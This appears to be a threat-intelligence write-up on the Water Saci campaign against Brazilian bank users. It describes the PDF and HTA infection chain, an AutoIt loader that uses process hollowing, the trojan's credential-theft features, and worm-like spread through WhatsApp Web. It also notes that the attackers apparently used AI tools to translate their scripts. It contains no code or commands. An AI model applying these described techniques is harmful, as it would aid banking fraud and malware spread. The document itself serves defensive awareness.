Water Saci Banking Trojan

Cybercriminal operations continue to evolve, and the Brazilian threat actor Water Saci has demonstrated a remarkable leap in sophistication. Recent campaigns leverage multi-layered infection chains using HTA files, PDFs, and WhatsApp to propagate a banking trojan, targeting Brazilian users with unprecedented efficiency.

Multi-Format Attack Chain: From PowerShell to Python

The latest wave marks a significant shift in Water Saci's tactics. Previously reliant on PowerShell, the threat actor now employs a Python-based variant that spreads malware in a worm-like fashion via WhatsApp Web.

Key elements of this enhanced attack chain include:

PDF Lures: Victims receive PDF files instructing them to update Adobe Reader by clicking a malicious link.

HTA Files: When executed, these files run Visual Basic Scripts that launch PowerShell commands to fetch payloads, including an MSI installer for the trojan and the Python script responsible for WhatsApp propagation.

This multi-format approach demonstrates how Water Saci has layered its attack mechanisms, likely using AI or automated tools to translate scripts from PowerShell to Python. This increases compatibility, speed, resilience, and maintainability of the malware delivery.

MSI Installer & AutoIt-Based Trojan Loader

The MSI installer serves as the delivery mechanism for the banking trojan. Its AutoIt script performs several critical functions:

• Ensures only one instance of the trojan is running by checking for a marker file (executed.dat) and notifying an attacker-controlled server.
• Verifies system language settings (Portuguese-Brazil) before scanning for banking-related files and applications, including Bradesco, Warsaw, Topaz OFD, Sicoob, and Itaú.
• Searches Google Chrome history for visits to major Brazilian banks: Santander, Banco do Brasil, Caixa Econômica Federal, Sicredi, and Bradesco.

The loader uses process hollowing and intermediate PE loading via TDA/DMP files to inject the trojan into memory, achieving stealth and persistence. If the trojan process is terminated, it automatically re-injects when the victim accesses a banking site.

Trojan Functionality: Aggressive Reconnaissance & Credential Theft

Water Saci's trojan exhibits advanced capabilities for monitoring, control, and data theft, including:

• Window title monitoring to detect banking or cryptocurrency platforms.
• Forced browser termination to reopen sites under attacker control.
• Host and system reconnaissance through WMI queries.
• Registry modifications for persistence.
• C2 communication for remote control.
• Supported operations include:
• Sending system information
• Keyboard and screen capture
• Simulating mouse activity
• File operations (upload/download)
• Window enumeration
• Creating fake banking overlays

This functionality mirrors LATAM-focused banking trojans like Casbaneiro, reflecting structural and behavioral continuity while employing more advanced delivery mechanisms.

Python-Based WhatsApp Propagation

A notable innovation in the campaign is the Python script that propagates the malware via WhatsApp Web using the Selenium browser automation tool. Evidence suggests Water Saci may have employed large language models or code-translation tools to port the original PowerShell propagation logic to Python. Console outputs even include emojis, highlighting the new script's sophistication.

By exploiting WhatsApp's trust and reach, Water Saci can self-propagate malware at scale, bypassing traditional defenses and rapidly compromising victims.

Conclusion: A New Era of Messaging-Based Cyber Threats

The Water Saci campaign highlights a growing trend: cybercriminals weaponizing legitimate platforms like WhatsApp to deploy complex malware. By combining social engineering, AI-assisted script development, and multi-stage malware delivery, threat actors can maintain persistent banking trojan infections while evading conventional security controls.

This case underscores the need for heightened vigilance, robust endpoint protection, and user awareness, particularly in regions like Brazil, where messaging platforms play a central role in daily communication.